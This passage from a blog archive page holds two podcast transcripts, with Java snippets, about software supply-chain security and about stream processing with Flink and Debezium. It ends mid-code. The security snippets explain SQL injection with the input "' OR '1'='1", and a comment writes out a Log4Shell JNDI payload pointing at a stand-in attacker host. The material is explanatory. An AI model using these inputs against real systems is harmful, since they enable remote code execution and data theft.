SQL Archives | simplyblock
https://www.simplyblock.io/blog/tags/sql/

Automated Vulnerability Detection throughout your Pipeline with Brian Vermeer from Snyk
https://www.simplyblock.io/blog/automated-vulnerability-detection-throughout-your-pipeline-with-brian-vermeer-from-snyk-video/
Fri, 10 May 2024

This interview is part of simplyblock's Cloud Commute Podcast, available on YouTube, Spotify, iTunes/Apple Podcasts, Pandora, Samsung Podcasts, and our show site.

In this installment of the podcast, we're joined by Brian Vermeer (Twitter/X, Personal Blog) from Snyk, a cybersecurity company providing tooling to detect common code issues and vulnerabilities throughout your development and deployment pipeline. He talks about the necessity of multiple checks, commonly found threats, and how important it is to rebuild images for every deployment, even if the code hasn't changed.

EP11: Automated Vulnerability Detection throughout your Pipeline with Brian Vermeer from Snyk

Chris Engelbert: Welcome back everyone. Welcome back to the next episode of simplyblock’s Cloud Commute podcast. Today I have yet another amazing guest with me, Brian from Snyk.

Brian Vermeer: That’s always the question, right? How do you pronounce that name? Is it Snek, Snik, Synk? It’s not Synk. It’s actually it’s Snyk. Some people say Snyk, but I don’t like that. And the founder wants that it’s Snyk. And it’s actually an abbreviation.

Chris Engelbert: All right, well, we’ll get into that in a second.

Brian Vermeer: So now you know, I mean.

Chris Engelbert: Yeah, we’ll get back to that in a second. All right. So you’re working for Snyk. But maybe we can talk a little bit about you first, like who you are, where you come from. I mean, we know each other for a couple of years, but…

Brian Vermeer: That’s always hard to talk about yourself, right? I’m Brian Vermeer. I live in the Netherlands, just an hour and a half south of Amsterdam. I work for Snyk as a developer advocate. I’ve been a long term Java developer, mostly back end developer for all sorts of jobs within the Netherlands. Java champion, very active in the community, specifically the Dutch community. So the Netherlands Java user group and adjacent Java user groups do some stuff in the virtual Java user group that we just relaunched. That I’ve tried to be active and I’m just a happy programmer.

Chris Engelbert: You’re just a happy programmer. Does that even exist?

Brian Vermeer: Apparently, I am the living example.

Chris Engelbert: All right, fair enough. So let’s get back to Snyk and the cool abbreviation. What is Snyk? What does it mean? What do you guys do?

Brian Vermeer: Well, first of all, we create security tooling for developers. Our mission is to make security an integrated thing within your development lifecycle. In most companies it's an afterthought: one security team trying to do a lot of things, and we have something in the pipeline, and that's horrible, because as a developer I don't want to deal with that. If all tests are green, it's fine. But what if we perceive it in such a way as, "hey, catch it early, on your local machine," just like you do with unit tests? Maybe creating unit tests is already a hard job, but hey, let's say we're all good at that. Why not perceive security in that way? If we can catch things early, we probably do not have to do a lot of rework if something comes up. So that's why we create tooling for all stages of your software development lifecycle. And as I said, Snyk is an abbreviation. So now you know.

Chris Engelbert: So what does it mean? Or do you forget?

Brian Vermeer: So Now You Know.

Chris Engelbert: Oh!

Brian Vermeer: Literally. So now you know.

Chris Engelbert: Oh, that took a second.

Brian Vermeer: Yep. That takes a while for some people. Now, the thought behind that is we started as a software composition analysis tool, and people just bring in libraries. They have no clue what they're bringing in and what kind of implications come with that. So we can do tests on that. We can make reports of that. And you can make the decisions. So now at least you know what you're getting into.

Chris Engelbert: Right. And I think with implications and stuff, you mean transitive dependencies. Yeah. Stuff like that.

Brian Vermeer: Yeah.

Chris Engelbert: Yeah. And I guess that just got worse with Docker and images and all that kind of stuff.

Brian Vermeer: I won’t say it gets worse. I think we shifted the problem. I mean, we used to do this on bare metal machines as well that these machines also had an operating system. Right. So I’m not saying it’s getting worse, but developers get into more responsibility because let’s say we’re doing DevOps, whatever that may mean. I mean, ask 10 DevOps engineers. That’s nowadays a job. What DevOps is, you probably get a lot of questions about tooling and that, but apparently what we did is tearing down the wall between old fashioned developer creation and getting things to production. So the ops folks, so we’re now responsible as a team to do all of that. And now your container or your environment, your cluster, your code is all together in your Git repository. So it’s all code now. And the team creating it is responsible for it. So yes, it shifted the problem from being in separate teams now to all in one team that we need to create and maintain stuff. So I don’t, I don’t think we’re getting into worse problems. I think we’re, we’re shifting the problems and it’s getting easier to get into problems. That’s, that’s what I, yeah.

Chris Engelbert: Yeah. Okay. We've broadened the scope of where you could potentially run into issues. So the way it works is that Snyk... I need to remember to say Snyk and not Synk, because now it makes sense.

Brian Vermeer: I’m okay with however you call it. As long as you don’t say sync, I’m fine. That’s, then you’re actually messing up letters.

Chris Engelbert: Yeah, sync is different. It's not awkward and it's not Worcester. Anyway. So that means the tooling is actually looking into, I think, the dependencies, the build environment, whatever ends up in your Docker container or your container image. Let's say it that way, since nobody's using Docker anymore. And all those other things. So basically everything along the pipeline, or the build pipeline, right?

Brian Vermeer: Yeah. You can say that. Actually, we start at the custom code that you're writing. So we're doing static analysis on that as well. We might combine that with what we know about your dependencies and the transitive dependencies that come with them, like, "hey, you bring in a Spring Boot starter, and that has a ton of implications for how many libraries come in." Are these affected? Yes or no, et cetera, et cetera. Then we go one layer deeper, or around that: your container images. And let's say it's Docker, because it's still the most commonly used, but whatever; any image is built on a base image, and probably you put some binaries in there. So what's there? That's another shell around the whole application. And then, in the end, you get into, for instance, the configuration for your infrastructure as code. That can go wrong by not having a security context, or by some policies that are badly set up, or something like that. Some pods that you gave more privileges than you should have because, hey, it works on my machine, right? Let's ship it. These kinds of things. So on all these four fronts, we try to provide tooling and test capabilities in such a way that you can choose how you want to utilize them: either in a CI pipeline, or on your local machine, or in between, or as part of your build, whatever fits your needs. Instead of, "hey, this needs to be part of your build pipeline, because that's how the tool works." I was a backend developer myself for a long time, and I was the person that was like, if we need to satisfy that tool, I will find a way around it.

Chris Engelbert: Yeah, I hear you.

Brian Vermeer: Which defeats the purpose, because at that point you're only checking boxes. So I think if these tools fit your way of working and implement your way of working, then you actually have an enabler instead of a wall that you bump into every time.

Chris Engelbert: Yeah. That makes a lot of sense. So that means when you say you start at the code level, the simple and still most common things, like SQL injection issues and all that kind of stuff, are probably handled as well, right?

Brian Vermeer: Yeah. SQL injections, path traversal injections, cross-site scripting, all these kinds of things will get flagged, and where possible, we will give you remediation advice on that. And then we go levels deeper. So you can almost say it's like four different types of scanners that you can use in whatever way you want. Some people are like, no, I'm only using the dependency analysis stuff. That's also fine. It's just four different capabilities for basically four levels in your application, because it's no longer just your binary that you put in. It's more than that, as we just discussed.
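To make the first of those concrete, here is a minimal sketch of the SQL injection pattern a static analyzer flags, next to the usual remediation with a parameterized query. The table and method names are made up for illustration; only the JDBC calls are standard.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;

public class UserLookup {

    // Vulnerable: untrusted input is concatenated into the query string.
    // Input like "' OR '1'='1" changes the meaning of the statement.
    ResultSet findUserUnsafe(Connection conn, String name) throws SQLException {
        Statement stmt = conn.createStatement();
        return stmt.executeQuery("SELECT * FROM users WHERE name = '" + name + "'");
    }

    // Remediation: a parameterized query treats the input strictly as data,
    // never as part of the SQL statement itself.
    ResultSet findUserSafe(Connection conn, String name) throws SQLException {
        PreparedStatement stmt = conn.prepareStatement("SELECT * FROM users WHERE name = ?");
        stmt.setString(1, name);
        return stmt.executeQuery();
    }
}
```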

Chris Engelbert: So, when we look at the recent and not so recent past... I mean, we're both coming from the Java world; you said you were a Java programmer for a long time, and I am too. The Java world isn't necessarily known for massive CVEs, except Log4Shell.

Brian Vermeer: Yeah, that was a big one.

Chris Engelbert: Right? Yeah.

Brian Vermeer: The thing, I think, is that in the Java world it's either not so big or very big. There's no in between, or at least it doesn't get the amount of attention. But yeah, Log4Shell was a big one, because, first of all, props to the folks that maintain that library; I think there were only three active maintainers at the point when the thing came out, and it's a small library that is used and consumed by a lot of bigger frameworks. So everybody was looking at them like they were doing a bad job, and it was just three people maintaining it voluntarily.

Chris Engelbert: So for the people that do not know what Log4Shell was. So Log4J is one of the most common logging frameworks in Java. And there was a way to inject remote code and execute it with basically whatever permission your process had. And as you said, a lot of people love to run their containers with root privileges. So there is your problem right there. But yeah, so Log4Shell was, I think, at least from what I can remember, probably like the biggest CVE in the Java world, ever since I joined.
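For readers who want to see the mechanics, here is a hedged sketch of the kind of innocent-looking Log4j call that was exploitable in CVE-2021-44228. The class and header are illustrative; the point is that vulnerable Log4j 2.x versions expanded lookup expressions inside logged values.

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class LoginController {

    private static final Logger log = LogManager.getLogger(LoginController.class);

    void onLogin(String userAgent) {
        // With vulnerable Log4j 2.x versions, logging attacker-controlled input
        // such as "${jndi:ldap://attacker.example/a}" triggered a JNDI lookup,
        // which could load and execute remote code with the privileges of the
        // logging process (hence the concern about containers running as root).
        log.info("Login attempt, User-Agent: {}", userAgent);
    }
}
```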

Brian Vermeer: Maybe that one, but in 2017 we had the Apache Struts one that blew away our friendly neighborhood Equifax. But yeah.

Chris Engelbert: I’m not talking about struts because that was like so long deprecated by that point of time. It was, it was, it was … They deserved it. No, but seriously, yeah. True, true. The struts one was also pretty big, but since we are just recording it, this on April 3rd, there was just like a very, very interesting thing that was like two days ago, three days ago, like April 1st. I think it was actually April 1st, because I initially thought it’s an April’s Fool joke, but it was unfortunately not.

Brian Vermeer: I think it was the last day of March though. So it was not.

Chris Engelbert: Maybe I just saw it on April 1st. To be honest, initially I thought, okay, that's a really bad April Fools' joke. So what we're talking about is the XZ issue. Maybe you want to say a few words about that?

Brian Vermeer: Well, let’s keep it simple. The XZ issue is basically an issue in one of the tools that come with some Linux distributions. And long story short, I’m not sure if they already created exploits on that. I didn’t, I didn’t actually try it because we’ve got folks that are doing the research. But apparently there, because of that tool, you could do nasty stuff such as arbitrary code executions or, or things with going into secure connections. At least it comes with your operating system. So that means if you have a Docker image or whatever image and you’re based on a certain well-known Linux distribution, you might be infected, regardless of whatever your application does. And it’s a big one. If you want to go deeper, there are tons of blogs of people that can explain to you what the actual problem was. But I think for the general developers, like, don’t shut your eyes and like, it’s not on my machine. It might be in your container because you’re using an outdated, now outdated image.

Chris Engelbert: I think there’s two things. First of all, I think it was found before it actually made it into any distribution, which is good. So if you’re, if you’re not using any of the like self-built distributions, you’re probably good. But what I found more interesting about it, that this backdoor was introduced from a person that was working on the tool for quite a while, like over a year or so, basically getting the trust of the actual maintainers and just sneaking stuff in eventually. And that is… That is why I think tools like Snyk or let’s, let’s be blunt, some of the competitors are so important, right? Because it’s, it’s really hard to just follow all of the new CVEs and sometimes they’re not blowing up this big. So you probably don’t even hear about them, but for that reason, it’s really important to have those tools.

Brian Vermeer: I totally agree. I mean, as a development team, it is a side activity for you. You're building stuff, and you don't focus on manually checking whatever comes in and whether it's vulnerable or not. But you should be aware of these kinds of things, so when they come in, you can make appropriate choices. I'm not saying you have to fix it; that's up to you, and your threat level, and whatever is going on in your company. But you need to be able to make these decisions based on accurate knowledge. And yeah, you don't want to manually hunt these things down. You want to be actively pinged when something happens to your application that might have implications for your security risk.

Chris Engelbert: Right. And from your own feeling, like, in the past, we mostly deployed like on-prem installations or in like private clouds, but with the shift to public cloud, do we increase the risk factor? Do we increase the attack surface?

Brian Vermeer: Yes. The short answer is yes. There are more things that we have under our control as a development team, and we do not always have the necessary specialties within the team. So we're doing the best we can, but that means we've got multiple attack surfaces. Your connection with your application is one thing, but if I can get into your container for some reason, I can use that. Even though some things in containers or in operating systems might not be directly exploitable, they can be part of a chain that causes a problem. So if there's one hole, I could get in, use certain objects or certain binaries in my chain of attacks, and make it a domino effect, basically. So you're giving people more and more ammunition. And as we automate certain things, we do not always have the necessary knowledge about them, and that might become bigger and bigger. Plus there's the fast pace we're currently moving at. Like, tell me, 10 years ago, how were you deploying?

Chris Engelbert: I don’t know. I don’t remember. I don’t remember yesterday.

Brian Vermeer: Yeah. But I mean, probably not three times a day. Ten years ago we were probably deploying once a month, and you had time to test, or something like that. So it's a combination of doing it all within one team, which, yes, we should do, but also the fast pace at which we need to release nowadays. The whole continuous development and continuous deployment thing is part of this. If you're actually doing that, of course.

Chris Engelbert: Yeah, that’s, that’s true. I think it would have been like about every two weeks or so. But yeah, you normally had like one week development, one week bug fixing and testing, and then you deployed it. Now it’s like, you do something, you think it’s ready, it runs through the pipeline. And in the best case, it gets deployed immediately. And if something breaks, you gonna fix it. Or are you in the worst case, you roll back if it’s really bad.

Brian Vermeer: But on the other end, say you're an application developer, and you need to ship that stuff in a container. Do you touch your container, or rebuild your container, if your application didn't change?

Chris Engelbert: Yes.

Brian Vermeer: Probably a lot of folks won't, because, hey, things didn't change. But it can be that the image you base your stuff upon, your base image or however you manage that (it can be company-wide, or you just pull something from Docker Hub or whatever), is another layer that might have changed, and might have been fixed, or might have had vulnerabilities found in it. So it's no longer, 'hey, I didn't touch that application, so I don't have to rebuild.' Yes, you should, because other layers in that whole application changed.

Chris Engelbert: Right, right. And I think you brought up an important other factor. It might be that in the meantime, between the last deployment and now, a CVE has been found, or something else, right? So you want to make sure you test it again. And then you have other programming languages, I'm not naming things here, but you might get a slightly newer version of a dependency when you do a fresh install, right? And there are so many different things. Applications these days, even microservices, are so complex, because they normally need so many different dependencies. And it is hard to keep an eye on that. And that kind of brings me to the next question: how does Snyk play into something like SBOMs, the software bill of materials?

Brian Vermeer: Getting into the hype train of SBOMs. Now, it's not just a hype train. I mean, it's a serious thing. For folks that don't know, you can compare an SBOM to the ingredients and nutrition list for whatever you try to stuff in your face. You have no clue what's in there; the nutrition facts on the package should say what's in it, right? So that's how you should perceive an SBOM. If you create an artifact, then you should create a suitable SBOM with it that basically says, 'okay, I'm using these dependencies and these transitive dependencies, and maybe even these Docker containers; I'm using these things to create my artifact.' And a consumer of that artifact is then able to search in that. Say a new CVE comes up, a new Log4Shell, let's make it big. 'Am I affected?' That's the first question a consumer, or somebody that uses your artifact, asks. And with an SBOM, you have a standardized (well, there are three standards, but nevertheless, a standardized) way of recording that, and it makes it at least machine-searchable, so you can see whether you are vulnerable or not. So how do we play into that? Yes, you can use our Snyk tooling to create SBOMs for your applications or for your containers; that's possible. And we have the capabilities to read SBOMs in, to see if they contain packages or artifacts with known vulnerabilities, so you can again take the appropriate measures. So yes, SBOMs are great from the consumer side. It's very clear what that stuff I got from the internet or from a supplier (because we're talking about supply chains all the time) is built upon, so I can see whether it contains problems, or potential problems when something new comes up. And yes, we have capabilities for creating these SBOMs and scanning these SBOMs.
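As a rough illustration of the 'machine-searchable' part, the sketch below reads a CycloneDX-style JSON SBOM with Jackson and lists its components. The file name is a placeholder and the field names follow the public CycloneDX spec; matching components against an actual vulnerability database is left out.

```java
import com.fasterxml.jackson.databind.JsonNode;
import com.fasterxml.jackson.databind.ObjectMapper;
import java.io.File;
import java.io.IOException;

public class SbomScan {

    public static void main(String[] args) throws IOException {
        // A CycloneDX JSON SBOM lists what went into an artifact as "components".
        JsonNode sbom = new ObjectMapper().readTree(new File("bom.json"));
        for (JsonNode component : sbom.path("components")) {
            String name = component.path("name").asText();
            String version = component.path("version").asText();
            // A real consumer would now match name/version (or the "purl" field)
            // against a vulnerability database to answer "am I affected?".
            System.out.printf("%s %s%n", name, version);
        }
    }
}
```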

Chris Engelbert: All right. We’re basically out of time. But there’s one more question I still want to ask. And how do you or where do you personally see the biggest trend could be related to Snyk to security in general?

Brian Vermeer: The biggest trend is the hype around AI nowadays. And that is definitely a thing. What people think is that AI is a suitable replacement for a security engineer. Yeah, I exaggerate now, but it's not, because we have demos where we let a well-known code assistant tool spit out vulnerable code, for instance. So I think the trend is two things. The whole software supply chain, whatever you pull in, is one thing you should look at. But the other is that if people are using AI, they shouldn't trust it blindly. And I think that goes for everything, both for stuff in your supply chain and for code generated by a code assistant. You should know what you're doing. It's a great tool, but don't trust it blindly, because it can also hallucinate and bring in stuff that you didn't expect if you're not aware of what you're doing.

Chris Engelbert: So yeah. I think that is a perfect closing. It can hallucinate things.

Brian Vermeer: Oh, definitely. It's a lot of fun to play with, and it's also a great tool. But you should know that, first of all, it doesn't replace developers who think. Thinking is still something an AI doesn't do.

Chris Engelbert: All right. Thank you very much. Time is over. 20 minutes is always super, super short, but it’s supposed to be that way. So Brian, thank you very much for being here. I hope that was not only interesting to me. I actually learned quite a few new things about Snyk because I haven’t looked into it for a couple of years now. So yeah, thank you very much. And for the audience, I hope you’re listening next week. New guest, new show episode, and we’re going to see you again.

Coding the Cloud: A Dive into Data Streaming with Gunnar Morling from Decodable (video + interview)
https://www.simplyblock.io/blog/coding-the-cloud-a-dive-into-data-streaming-with-gunnar-morling-video/
Fri, 26 Apr 2024

This interview is part of simplyblock's Cloud Commute Podcast, available on YouTube, Spotify, iTunes/Apple Podcasts, Pandora, Samsung Podcasts, and our show site.

In this installment of the podcast, we're joined by Gunnar Morling (X/Twitter) from Decodable, a cloud-native stream processing platform that makes it easier to build real-time applications and services. He highlights the challenges and opportunities in stream processing, as well as the evolving trends in database and cloud technologies.

Chris Engelbert: Hello everyone. Welcome back to the next episode of simplyblock's Cloud Commute podcast. Today I have a really good guest, and a really good friend, with me. We've known each other for quite a while; I don't know, many, many years. Another fellow German. And I guess, at least when you're in the Java world, you must have heard of him. You must have heard him, even. Gunnar, welcome. Happy to have you.

Gunnar Morling: Chris, hello, everybody. Thank you so much for having me. Super excited. Yes, I don't know, to be honest, for how long we have known each other. Definitely quite a few years, you know, always running into each other in the Java community.

Chris Engelbert: Right. I think the German Java community is very encapsulated. There's a good chance you know a good chunk of them.

Gunnar Morling: I mean, you would actively have to try and avoid each other, I guess, if you really don’t want to meet somebody.

Chris Engelbert: That is very, very true. So, well, we already heard who you are, but maybe you can give a little bit of a deeper introduction of yourself.

Gunnar Morling: Sure. So, I'm Gunnar. I work as a software engineer at a company called Decodable. We are a small startup in the data streaming space, essentially moving and processing your data, and I think we will talk more about what that means. So, that's my current role. And I have, you know, a bit of a mixed role between engineering and also doing outreach work, like blog posts, podcasts, sometimes going to conferences, talking about things. Before that, I was at Red Hat for exactly 10 years, up to the day, where I worked on several projects. I started out working on different projects from the Hibernate umbrella. Yes, it's still a thing. I still like it. So, I was doing that for roughly five years, working on Bean Validation. I was the spec lead for Bean Validation 2.0, for instance, which I think is also how we met, or at least I believe we interacted somehow in the context of Bean Validation. I remember something there. And then, well, I worked on a project which is called Debezium. It's a tool and a platform for change data capture, and again, we will dive into that. But I guess that's what people might know me for. I'm also a Java champion, as you are, Chris. And I did this challenge. I need to mention it. I did this kind of viral challenge in the Java space; some people might also have come across my name in that context.

Chris Engelbert: All right. Let’s get back to the challenge in a moment. Maybe say a couple of words about Decodable.

Gunnar Morling: Yes. So, essentially, we built a SaaS, a software as a service, for stream processing. This means, essentially, it connects to all kinds of data systems, let's say databases like Postgres or MySQL, or streaming platforms like Kafka and Apache Pulsar. It takes data from those kinds of systems. And in the simplest case, it just takes this data and puts it into something like Snowflake, a search index, maybe another database, maybe S3, maybe something like Apache Pinot or ClickHouse. So, it's about data movement in the simplest case, taking data from one place to another. And very importantly, all this happens in real time. So, it's not batch driven, like, you know, running once per hour, once per day or whatever. This happens in near real time. So, not in the hard, you know, computer science sense of the word, with a fixed SLA, but with a very low latency, like seconds, typically. But then, going beyond data movement, there's also what we would call data processing. So, it's about filtering your data, transforming it, routing it, joining multiple of those real-time data streams, doing things like groupings and real-time analytics of this data, so you can gain insight into your data. So, this is what we do. It's based on Apache Flink as the stream processing engine, and on Debezium as the CDC tool, which gives you source connectivity with all kinds of databases. And yeah, people use it, as I mentioned, for taking data from one place to another, but then also for, I don't know, doing fraud detection, gaining insight into their purchase orders or customers, you know, all those kinds of things, really.

Chris Engelbert: All right, cool. Let's talk about your challenge real quick, because you already mentioned stream processing. Before we go on with the other stuff, let's talk about the challenge. What was that about?

Gunnar Morling: What was that about? Yes, this was, to be honest, kind of a random thing, which I started over the holidays between Christmas and New Year's Eve. This had been on my mind for quite some time, doing something like processing one billion rows, because that's what it was, a one billion row challenge. And somehow I then had this idea: okay, let me just put it out into the community, let's make a challenge out of it, and essentially ask people, how fast can you be with Java at processing one billion rows of a CSV file? The task was to take temperature measurements, which were given in that file, and aggregate them per weather station. So, the rows in this file were essentially always a weather station name and then a temperature value, and you had to aggregate them per station, which means you had to get the minimum, the maximum, and the mean value per station. So, this was the task. And then it kind of took off. Many people from the community entered this challenge, including really big names like Aleksey Shipilëv, Cliff Click, and Thomas Wuerthinger, the lead of GraalVM at Oracle, and many, many others. They started to work on this and kept working on it for the entire month of January, really bringing down those execution times. In the end, it was less than two seconds for processing this file, which was 13 gigabytes in size, on an eight-core CPU configuration.
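For readers who want to try the challenge themselves, a naive baseline looks roughly like the sketch below: each line of the file is 'station;temperature', folded into min/mean/max per station. The fast solutions avoid this approach entirely (parallel parsing over raw bytes, no per-line allocation), but it shows the task.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.Map;
import java.util.TreeMap;

public class BaselineAggregator {

    record Stats(double min, double max, double sum, long count) {
        Stats merge(double v) {
            return new Stats(Math.min(min, v), Math.max(max, v), sum + v, count + 1);
        }
    }

    public static void main(String[] args) throws IOException {
        Map<String, Stats> byStation = new TreeMap<>();
        try (var lines = Files.lines(Path.of("measurements.txt"))) {
            lines.forEach(line -> {
                // Each row looks like "Hamburg;12.0".
                int sep = line.indexOf(';');
                String station = line.substring(0, sep);
                double value = Double.parseDouble(line.substring(sep + 1));
                byStation.merge(station, new Stats(value, value, value, 1),
                        (existing, ignored) -> existing.merge(value));
            });
        }
        // Print min/mean/max per station, as the challenge required.
        byStation.forEach((station, s) -> System.out.printf("%s=%.1f/%.1f/%.1f%n",
                station, s.min(), s.sum() / s.count(), s.max()));
    }
}
```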

Chris Engelbert: I think the important thing is he said less than a second, which is already impressive because a lot of people think Java is slow and everything. Right. We know those terms and those claims.

Gunnar Morling: By the way, I should clarify. I mean, this is highly parallelizable, right? So, the less-than-a-second number, I think like 350 milliseconds or so, this was on all 32 cores I had in this machine, with hyper-threading, with turbo boost. So, this was the best I could get.

Chris Engelbert: But it also included reading those, like 13 gigs, right? And I think that is impressive.

Gunnar Morling: Yes, but reading from memory. Essentially, I wanted to make sure that disk I/O is not part of the equation, because it would be super hard to measure for me anyway. So that's why I said, okay, I will have everything in a RAM disk. Everything came out of memory in that context.

Chris Engelbert: Ok. Got it. But still, it went pretty viral. I've seen it from the start, and I was kind of blown away by who joined that discussion. It was really cool to watch and follow up on. I didn't have time to jump into it myself, but by the numbers and the results I've seen, I would not have won anyway. So that was me not wasting time.

Gunnar Morling: Absolutely. I mean, people pulled off really crazy tricks to get there. And by the way, if you're at JavaLand in a few weeks, I will do a talk about some of those things.

Chris Engelbert: I think by the time this comes out, it was a few weeks ago. But we’ll see.

Gunnar Morling: Ok. I made the mistake of every recording: I made a temporal reference.

Chris Engelbert: That’s totally fine. I think a lot of the JavaLand talks are now recorded these days and they will show up on YouTube. So when this comes out and the talks are already available, I’ll just put it in the show notes.

Gunnar Morling: Perfect.

Chris Engelbert: All right. So that was the challenge. Let's get back to Decodable. You mentioned Apache Flink as the underlying technology you build on. So how does that work?

Gunnar Morling: So Apache Flink, essentially, is an open source project which concerns itself with real-time data processing. It's essentially an engine for processing either bounded or unbounded streams of events. There's also a way you could use it in a batch mode, but this is not what we are too interested in so far. For us, it's always about unbounded data streams, coming from a Kafka topic, for instance. So it takes those event streams and defines semantics on them: what's event time? What does it mean if an event arrives late or out of order? So you have the building blocks for all those kinds of things. Then you have a stack, a layer of APIs, which allow you to implement stream processing applications. There are more imperative APIs, in particular what is called the DataStream API. There you really program your flow in an imperative way, in Java, typically, or Scala, I guess. Yeah, Scala, I don't know who does that, but there may be some people. And then there are more and more abstract APIs. There's the Table API, which essentially gives you a relational programming paradigm. And finally, there's Flink SQL, which also is what Decodable employs heavily in the product. There you reason about your data streams in terms of SQL. So let's say you want to take data from an external system; you would express this as a CREATE TABLE statement, and then this table would be backed by a Kafka topic. And you can then do a SELECT from such a table. And then, of course, you can do projections by massaging your SELECT clause, you can do filtering by adding WHERE clauses, you can join multiple streams by using the JOIN operator, and you can do windowed aggregations. I would say that's the most accessible way of doing stream processing, because there is, of course, a large number of people who can write SQL, right?

Chris Engelbert: Right. And I just wanted to say, it's a SQL dialect that is, as far as I've seen, pretty close to standard SQL.

Gunnar Morling: Yes, exactly. And then there are a few extensions, you know, because you need to have this notion of event time. What does it mean? How do you express how much lateness you would be willing to accept for an aggregation? So there are a few extensions like that, but overall, it's SQL. For my demos, oftentimes I can start developing some queries on Postgres, and then I just take them, paste them into the Flink SQL client, and they might just run as is, or they may need a little bit of adjustment. But it's pretty much standard SQL.
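As a hedged sketch of what that looks like in practice, here is the pattern Gunnar describes, expressed with Flink's Table API from Java: a Kafka-backed table with a watermark, and a tumbling-window aggregation over it. The topic, fields, and connector options are illustrative; the SQL follows the Flink SQL documentation (the group-window syntax shown here is the older style; newer Flink versions also offer windowing table-valued functions).

```java
import org.apache.flink.table.api.EnvironmentSettings;
import org.apache.flink.table.api.TableEnvironment;

public class OrdersPerHour {

    public static void main(String[] args) {
        TableEnvironment tEnv =
                TableEnvironment.create(EnvironmentSettings.inStreamingMode());

        // A table backed by a Kafka topic; the WATERMARK clause declares how much
        // out-of-orderness (lateness) we are willing to accept on event time.
        tEnv.executeSql(
                "CREATE TABLE orders (" +
                "  order_id STRING," +
                "  category STRING," +
                "  ts TIMESTAMP(3)," +
                "  WATERMARK FOR ts AS ts - INTERVAL '5' SECOND" +
                ") WITH (" +
                "  'connector' = 'kafka'," +
                "  'topic' = 'orders'," +
                "  'properties.bootstrap.servers' = 'localhost:9092'," +
                "  'scan.startup.mode' = 'earliest-offset'," +
                "  'format' = 'json'" +
                ")");

        // Orders per category and hour, emitted as each window closes.
        tEnv.executeSql(
                "SELECT category," +
                "       TUMBLE_START(ts, INTERVAL '1' HOUR) AS window_start," +
                "       COUNT(*) AS order_count" +
                " FROM orders" +
                " GROUP BY category, TUMBLE(ts, INTERVAL '1' HOUR)")
            .print();
    }
}
```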

Chris Engelbert: All right, cool. The other thing you mentioned was the Debezium. And I know you, I think you originally started Debezium. Is that true?

Gunnar Morling: It’s not true. No, I did not start it. It was somebody else at Red Hat, Randall Hauck, he’s now at Confluent. But I took over the project quite early on. So Randall started it. And I know I came in after a few months, I believe. And yeah, I think this is when it really took off, right? So, you know, I went to many conferences, I spoke about it. And of course, others as well. The team grew at Red Hat. So yeah, I was the lead for quite a few years.

Chris Engelbert: So for the people that don’t know, maybe just give a few words about what Debezium is, what it does, and why it is so cool.

Gunnar Morling: Right. Yes. Oh, man, where should I start? In a nutshell, it's a tool for what's called change data capture. This means it taps into the transaction log of your database, and then, whenever there's an insert or an update or a delete, it will capture this event and propagate it to consumers. So essentially, you could think about it like the observer pattern for your database. Whenever there's a data change, like a new customer record gets created or a purchase order gets updated, those kinds of things, you can react and extract this change event from the database and push it to consumers, either via Kafka, or via callbacks in an API way, or via, you know, Google Cloud Pub/Sub, Kinesis, all those kinds of things. And then, well, you can take those events, and it enables a ton of use cases. In the simplest case, it's just about replication: taking data from your operational database to your cloud data warehouse, or to your search index, or maybe to a cache. But then people also use change data capture for things like microservices data exchange, because, I mean, with microservices you want to have them self-contained, but still they need to exchange data, right? They don't exist in isolation, and change data capture can help with that, in particular with what's called the outbox pattern. Just as a side note, people also use it for splitting up monolithic systems into microservices. And you can use this change event stream as an audit log. I mean, if you think about it: if you just keep those events, all the updates to a purchase order, and put them into a database, it's kind of like an audit log, right? Maybe you want to enrich it with a bit of metadata. You can do streaming queries, so maybe you want to spot specific patterns in your data as it changes and then trigger some sort of alert. That's a use case, and many, many more. Really, it's a super versatile tool, I would say.
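To make the 'observer pattern for your database' idea tangible, here is a hedged sketch using Debezium's embedded engine, one of the callback-style deployment options mentioned above. The connector and connection settings are illustrative placeholders; each committed insert, update, or delete on the captured tables arrives at the callback as a JSON change event with before/after state.

```java
import io.debezium.engine.ChangeEvent;
import io.debezium.engine.DebeziumEngine;
import io.debezium.engine.format.Json;
import java.util.Properties;
import java.util.concurrent.Executors;

public class ChangeFeed {

    public static void main(String[] args) {
        Properties props = new Properties();
        props.setProperty("name", "orders-feed");
        props.setProperty("connector.class", "io.debezium.connector.postgresql.PostgresConnector");
        props.setProperty("offset.storage", "org.apache.kafka.connect.storage.FileOffsetBackingStore");
        props.setProperty("offset.storage.file.filename", "/tmp/offsets.dat");
        props.setProperty("database.hostname", "localhost");
        props.setProperty("database.port", "5432");
        props.setProperty("database.user", "postgres");
        props.setProperty("database.password", "postgres");
        props.setProperty("database.dbname", "shop");
        props.setProperty("topic.prefix", "shop");

        // The engine tails the transaction log and invokes the callback for every
        // captured change event; the event's "op" field is c/u/d for
        // create/update/delete, with "before" and "after" row state.
        DebeziumEngine<ChangeEvent<String, String>> engine = DebeziumEngine.create(Json.class)
                .using(props)
                .notifying(event -> System.out.println(event.value()))
                .build();

        Executors.newSingleThreadExecutor().execute(engine);
    }
}
```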

Chris Engelbert: Yeah, and I also have a couple of talks in that area. And I think my favorite example, something that everyone understands, is that you have some order coming in, and now you want to send out invoices. Invoices don't need to be sent in the same operation, but you want to make sure that you only send out the invoice if the order was actually persisted in the database. That is where the outbox pattern comes in; or you just look at the order table in general and filter out all the new orders.

Gunnar Morling: Yes.
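Since the outbox pattern keeps coming up, here is a minimal sketch of its core idea with plain JDBC: the business row and the event describing it are written in the same transaction, and CDC then publishes the outbox row. Table and column names are made up for illustration.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.SQLException;

public class OrderService {

    // Insert the order and its "order created" event atomically. Debezium picks
    // the outbox row out of the transaction log and publishes it, so a consumer
    // (e.g., the invoicing service) only ever sees events for orders that were
    // really committed.
    void placeOrder(Connection conn, String orderId, String payloadJson) throws SQLException {
        conn.setAutoCommit(false);
        try (PreparedStatement order = conn.prepareStatement(
                     "INSERT INTO orders (id, status) VALUES (?, 'NEW')");
             PreparedStatement outbox = conn.prepareStatement(
                     "INSERT INTO outbox (aggregate_id, event_type, payload) VALUES (?, 'OrderCreated', ?)")) {
            order.setString(1, orderId);
            order.executeUpdate();
            outbox.setString(1, orderId);
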